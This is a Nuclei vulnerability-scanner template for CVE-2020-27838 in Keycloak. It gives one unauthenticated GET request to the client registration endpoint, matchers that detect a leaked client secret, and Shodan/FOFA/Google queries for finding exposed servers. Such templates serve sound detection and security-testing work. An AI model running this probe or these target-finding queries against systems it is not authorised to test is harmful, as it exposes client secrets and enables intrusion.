nuclei-templates/http/cves/2020/CVE-2020-27838.yaml

64 lines
2.1 KiB
YAML

id: CVE-2020-27838
info:
name: KeyCloak - Information Exposure
author: mchklt
severity: medium
description: |
A flaw was found in keycloak in versions prior to 13.0.0. The client registration endpoint allows fetching information about PUBLIC clients (like client secret) without authentication which could be an issue if the same PUBLIC client changed to CONFIDENTIAL later. The highest threat from this vulnerability is to data confidentiality.
impact: |
The vulnerability allows an attacker to gain sensitive information from the KeyCloak server.
remediation: |
Apply the latest security patches or updates provided by the KeyCloak vendor.
reference:
- https://bugzilla.redhat.com/show_bug.cgi?id=1906797
- https://nvd.nist.gov/vuln/detail/CVE-2020-27838
- https://github.com/muneebaashiq/MBProjects
- https://github.com/j4k0m/godkiller
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
cvss-score: 6.5
cve-id: CVE-2020-27838
cwe-id: CWE-287
epss-score: 0.08135
epss-percentile: 0.93734
cpe: cpe:2.3:a:redhat:keycloak:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: redhat
product: keycloak
shodan-query:
- "title:\"keycloak\""
- http.title:"keycloak"
- http.html:"keycloak"
- http.favicon.hash:-1105083093
fofa-query:
- title="keycloak"
- icon_hash=-1105083093
- body="keycloak"
google-query: intitle:"keycloak"
tags: cve,cve2020,keycloak,exposure,redhat
http:
- method: GET
path:
- "{{BaseURL}}/auth/realms/master/clients-registrations/default/security-admin-console"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"clientId":"security-admin-console"'
- '"secret":'
condition: and
- type: word
part: header
words:
- 'application/json'
- type: status
status:
- 200
# digest: 4a0a0047304502201f345884c58dfcc695f374343e8a6e73f1e09258898a3ce7c24bcb6843f171a6022100eccc64ea1c2904bd250a915b963379a89c34634b0c0dfb065bd5de23d1e82342:922c64590222798bb761d5b6d8e72950